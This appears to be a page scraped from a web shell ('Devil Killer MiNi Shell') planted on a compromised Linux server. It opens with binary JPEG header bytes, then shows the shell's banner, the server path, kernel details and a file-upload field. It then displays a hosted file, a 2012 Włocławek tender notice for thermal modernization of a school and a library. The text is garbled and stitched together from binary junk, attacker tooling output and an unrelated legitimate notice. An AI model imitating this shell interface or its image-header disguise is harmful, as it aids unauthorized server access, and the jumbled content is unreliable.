JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121008/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121008/386972-N-2012.html

<p class="kh_header"><b>Włocławek: Termomodernizacja budynków użyteczności publicznej w mieście Włocławek w systemie zaprojektuj i wybuduj obiektu budowlanego w rozumieniu ustawy Prawo Budowlane.</b><br>
<b>Numer ogłoszenia: 386972 - 2012; data zamieszczenia: 08.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Włocławek - Urząd Miasta Włocławek , ul. Zielony Rynek 11/13, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 54 4144000, faks 54 4144257.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynków użyteczności publicznej w mieście Włocławek w systemie zaprojektuj i wybuduj obiektu budowlanego w rozumieniu ustawy Prawo Budowlane..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zaprojektowanie i realizację termomodernizacji  z podziałem na  2 zadania w systemie  zaprojektuj i wybuduj:

ZADANIE I - Termomodernizacja budynku II Liceum Ogólnokształcącego im. Mikołaja Kopernika, ul. Urocza 3 we Włocławku.

 ZADANIE II -Termomodernizacja budynku Miejskiej Biblioteki Publicznej  i Włocławskiej Informacji -Turystycznej, ul. Warszawska 11/13 we Włocławku. 

Fazy opracowań projektowych  oraz realizację wielobranżowych robót budowlanych należy wykonać  w oparciu o Program Funkcjonalno-Użytkowy (PFU), opracowany przez Panią Małgorzatę Głodek, współwłaścicielkę firmy Zakład Projektowania i Realizacji Inwestycji, Małgorzata i Wiesław Głodek 
z siedzibą przy ul. Kruszyńskiej 5 we Włocławku oraz zgodnie z audytem energetycznym, opracowanym przez Pana Zbigniewa Grabarkiewicza, właściciela firmy Projektowanie, Doradztwo Techniczne  z siedzibą w Poznaniu, Oś. Rusa 45 m 1.


Zakres zamówienia ZADANIA I i ZADANIA II: 
- sporządzenia, wielobranżowych inwentaryzacji dla potrzeb opracowań projektowych,
- opracowania  wielobranżowego  projektu  budowlanego, w tym opracowania kolorystyki elewacji, 
-opracowania wielobranżowego projektu wykonawczego, 
- wykonania wielobranżowych specyfikacji technicznych wykonania i odbioru robót budowlanych,
- sporządzenia wielobranżowych przedmiarów robót,
- wykonania kosztorysów (niezbędnych do rozliczeń cząstkowych zadania) na podstawie opracowanej dokumentacji budowlanej,  
- wykonania robót budowlanych wielobranżowych polegających na zrealizowaniu termomodernizacji, 
- opracowania świadectwa  energetycznego, w sytuacji przewidzianych przepisami prawa,
- uzyskania wszelkich stosownych uzgodnień wymaganych do projektu budowlanego.

ZADANIE I   -   budynek II Liceum Ogólnokształcącego im. M. Kopernika:
Budynek szkolny z dwiema salami gimnastycznymi wraz z zapleczem socjalnym. Budynek główny trzykondygnacyjny, całkowicie podpiwniczony połączony z halami sportowymi przez dwa łączniki jednokondygnacyjne, jeden z łączników jest podpiwniczony.

Ogólny zakres prac budowlanych:
- termoizolacja budynku,  tj. docieplenie ścian zewnętrznych wraz z podpiwniczeniem, wymiana starych okien na okna o U<= 1,5 wraz z nawiewnikami wraz z  niezbędnymi przebudowaniami otworów okiennych, wymiana drzwi zewnętrznych na szczelne,  ocieplenie stropodachów,
- remont wewnętrznej instalacji  c.o. w zakresie wyposażenia instalacji w zawory grzejnikowe z głowicami termostatycznymi, wymiana zaworów odcinających na podejściach pod piony oraz chemiczne płukanie instalacji, wymiana grzejników rurowo-żebrowych w dużej Sali gimnastycznej,  
- remont instalacji elektrycznej wewnętrznej i oświetlenia zewnętrznego w zakresie opisanym w PFU,
- wykonanie nowej instalacji odgromowej na budynku małej sali gimnastycznej z łącznikiem 
i dostosowanie istniejącej do nowych warunków po dociepleniu ścian na budynku głównym i dużej sali gimnastycznej,
-  ukrycia dla ptaków i nietoperzy zgodnie ze standardami montowania ukryć dla ptaków i nietoperzy jako element prac dociepleniowych - 4 szt,
- elewacja-kolorystyka,
- roboty odtworzeniowe po wykopach związanych z dociepleniem piwnic (utwardzenie terenu, odwodnienie terenu, rynny i opaski betonowe zieleń),
- Montaż  6 szt. ukryć dla ptaków i nietoperzy zgodnie ze standardami montowania ukryć dla ptaków i nietoperzy jako element prac dociepleniowych na budynku Zespołu Szkół Elektrycznych, ul, Toruńska 77/83 we Włocławku.

ZADANIE II  -  budynek Miejskiej Biblioteki Publicznej i Włocławskiej Informacji Turystycznej:
Budynek wolnostojący w zabudowie ulicznej, rozproszonej, dwupiętrowy, całkowicie podpiwniczony. Budynek jest w konstrukcji szkieletowej, ramowej. 

Ogólny zakres  robót budowlanych:
- termoizolacja budynku,  tj. docieplenie ścian zewnętrznych, częściowe zamurowanie okien w piwnicy wraz z przebudową studzienek okiennych - okna o U<= 1,5 wraz znawiewnikami,  wymiana drzwi zewnętrznych na szczelne,  ocieplenie stropodachów oraz  tarasu na 
I piętrze,
- remont wewnętrznej instalacji  c.o. w zakresie wyposażenia instalacji w zawory grzejnikowe z głowicami termostatycznymi, wymiana zaworów odcinających na podejściach pod piony oraz chemiczne płukanie instalacji,  
- remont instalacji elektrycznej oświetlenia zewnętrznego z montażem opraw energooszczędnych - ledowych,
- wykonanie nowej instalacji odgromowej,  
- montowanie ukryć dla ptaków i nietoperzy zgodnie ze standardami montowania ukryć dla ptaków i nietoperzy, jako element prac dociepleniowych  -  2 szt.,
- elewacja-kolorystyka..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.32.10.00-3, 45.33.11.00-7, 45.31.12.00-2, 71.22.10.00-3, 71.24.80.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium: 
- na Zadanie I - 20.000,00 zł brutto;- 
- na Zadanie II - 7.000,00 zł brutto.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Wykonawca, ubiegający się o udzielenie zamówienia, winien  wykazać się wykonaniem, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, co najmniej  dwóch zadań na opracowanie dokumentacji projektowo-kosztorysowej na budowę, przebudowę, rozbudowę budynków użyteczności publicznej o wartości minimum 60.000,00 złotych brutto każde zadanie.
2)	Wykonawca, ubiegający się o udzielenie zamówienia, winien wykazać się wykonaniem w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
co najmniej dwóch robót budowlanych o łącznej wartości co najmniej 1.000.000,00 złotych brutto, polegających na wybudowaniu lub przebudowie lub rozbudowie lub remoncie budynku, w zakres których wchodziło jednocześnie:
a)	wykonanie ocieplenia elewacji budynku, oraz
b)	wykonanie nowych pokryć dachowych z papy termozgrzewalnej lub wymiana  istniejących pokryć dachowych z papy termozgrzewalnej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca, ubiegający się o udzielenie zamówienia, winien dysponować potencjałem kadrowym -  własnym lub wyrażającym gotowość do współpracy - zdolnym do wykonania zamówienia, spośród których:
a)	co najmniej 1 osoba posiada uprawnienia budowlane do projektowania w  specjalności architektonicznej,
b)	co najmniej 1 osoba posiada uprawnienia budowlane do projektowania w  specjalności konstrukcyjno - budowlanej,
c)	co najmniej 1 osoba posiada uprawnienia budowlane do projektowania w  specjalności instalacyjnej  w zakresie instalacji i urządzeń cieplnych,
d)	co najmniej 1 osoba posiada uprawnienia budowlane do projektowania w  specjalności 
instalacyjnej w zakresie  instalacji i urządzeń elektrycznych,
e)	co najmniej 1 osoba posiada uprawnienia budowlane do kierowania robotami budowlanymi 
w  specjalności konstrukcyjno - budowlanej,
f)  co najmniej 1 osoba posiada uprawnienia budowlane do kierowania robotami budowlanymi 
w  specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych,
g)  co najmniej 1 osoba posiada uprawnienia budowlane do kierowania robotami budowlanymi 
w  specjalności  instalacyjnej w zakresie  instalacji i urządzeń elektrycznych.


 UWAGA: Zamawiający dopuszcza wskazanie tych samych osób na potwierdzenie spełniania warunku dysponowania potencjałem kadrowym w zakresie projektowania, jak i kierowania robotami budowlanymi, jeżeli legitymują się jednocześnie posiadaniem zarówno uprawnień budowlanych do projektowania, jak i uprawnień budowlanych do kierowania robotami budowlanymi.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty; 2. Pełnomocnictwo do podpisania oferty należy dołączyć do oferty, o ile nie wynika ono z innych dokumentów załączonych przez Wykonawcę; 3. Dowód wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza jednak możliwość wprowadzania zmian w umowie w stosunku do treści oferty, które będą mogły być dokonane z powodu zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy lub w przypadku wystąpienia którejkolwiek z następujących sytuacji:
1 w przypadku postanowień umowy dotyczących wykonania przez Wykonawcę dokumentacji projektowo - kosztorysowej:
1)	udzielenie w trakcie realizacji umowy zamówień dodatkowych i/lub uzupełniających, związanych z realizacją zamówienia podstawowego, mających wpływ na uzgodniony termin zakończenia jej realizacji (powodujących konieczność jego wydłużenia);
2)	przedłużenie terminu zakończenia przedmiotu umowy może nastąpić w przypadkach:
a)	rozszerzenia zakresu projektu wynikającego z warunków gestorów sieci i decyzji administracyjnych,
b)	zwłoki w działaniu instytucji opiniujących i uzgadniających ponad łączny czas wykonania przypisanych im czynności, o czas równy tej zwłoce,
c)	wystąpienia okoliczności siły wyższej - jako siłę wyższą należy rozumieć zdarzenia niezależne od żadnej ze Stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe, strajki oraz akty władzy i administracji publicznej,
d)	pisemnego żądania wstrzymania prac skierowanego do Wykonawcy przez Zamawiającego, o ile żądanie lub wydanie zakazów nie nastąpiło z przyczyn, za które Wykonawca ponosi odpowiedzialność,
e)	przedłużenie terminu zakończenia przedmiotu umowy może nastąpić wyłącznie przez zmianę umowy o udzielenie zamówienia publicznego, tj.: przez aneks do umowy;
2.	w przypadku postanowień umowy dotyczących wykonania przez Wykonawcę robót budowlanych:
1)	udzielenie w trakcie realizacji umowy zamówień dodatkowych, związanych z realizacją zamówienia podstawowego, mających wpływ na uzgodniony termin zakończenia jej realizacji (powodujących konieczność jego wydłużenia);
2)	przedłużenie terminu zakończenia przedmiotu umowy może nastąpić w przypadkach:
a)	wystąpienia niekorzystnych warunków atmosferycznych powodujących wstrzymanie lub przerwanie robót budowlanych w okresie dłuższym niż 10 dni kalendarzowych - potwierdzone pisemnie w dzienniku budowy, przy czym przesunięcie terminu robót nastąpi o tyle dni, przez ile trwało ich wstrzymanie (UWAGA: Niekorzystne warunki atmosferyczne nie dotyczą przerwania przez Wykonawcę robót w sezonie zimowym, tj.: od dnia 01 grudnia 2012 roku do dnia 15 marca 2013 roku),
b)	wystąpienia okoliczności siły wyższej - jako siłę wyższą należy rozumieć zdarzenia niezależne od żadnej ze Stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe, strajki oraz akty władzy i administracji publicznej,
c)	pisemnego żądania wstrzymania prac skierowanego do Wykonawcy przez Zamawiającego lub wydania zakazu prowadzenia prac przez organ administracji publicznej, o ile żądanie lub wydanie zakazów nie nastąpiło z przyczyn, za które Wykonawca ponosi odpowiedzialność,
d)	wystąpienie kolizji z istniejącymi sieciami koniecznymi do usunięcia w celu realizacji zadania podstawowego, czego nie można było przewidzieć w chwili zawarcia umowy,
e)	przedłużenie terminu zakończenia przedmiotu umowy może nastąpić wyłącznie przez zmianę umowy o udzielenie zamówienia publicznego, tj.: przez aneks do umowy.
3)	konieczności wykonania robót zamiennych (do których wykonania wystarczy zgoda zamawiającego oraz projektanta):
a)	roboty zamienne polegają na tym, że wykonawca zobowiązuje się do wykonania zamówienia podstawowego w sposób odmienny od określonego w umowie;
b)	roboty zamienne nie powodują zwiększenia (zmiany) zakresu świadczenia wykonawcy zawartego w ofercie;
c)	roboty zamienne nie mogą spowodować zwiększenia wynagrodzenia wykonawcy;
d)	konieczność wykonania robót zamiennych zachodzi w sytuacji, gdy:
A.	materiały budowlane przewidziane w umowie do wykonania zamówienia nie mogą być użyte przy realizacji inwestycji z powodu zaprzestania produkcji lub zastąpienia innymi;
B.	w trakcie wykonywania zamówienia nastąpiła zmiana przepisów prawa budowlanego;
C.	w czasie realizacji budowy zmienią się warunki techniczne wykonania (np. Polska Norma);
D.	w trakcie realizacji zamówienia zastosowano lepsze materiały budowlane bądź inną technologię wykonania robót.
e)	Uwzględnienie robót zamiennych w trakcie realizowanej inwestycji może nastąpić wyłącznie przez zmianę umowy o zamówienie publiczne, tj.: przez aneks do umowy.
4)	zmiany osób wymienionych w umowie po stronie którejkolwiek ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Inwestycji i Zamówień Publicznych, pok. 25A;
Urząd Miasta Włocławek;
Zielony Rynek 11/13;
87-800 Włocławek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2012 godzina 11:00, miejsce: Biuro Obsługi Mieszkańców, mieszczącym się w holu budynku A na stanowisku d/s obsługi kancelaryjnej Prezydenta Miasta Włocławek; Urząd Miasta Włocławek; Zielony Rynek 11/13; 87-800 Włocławek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
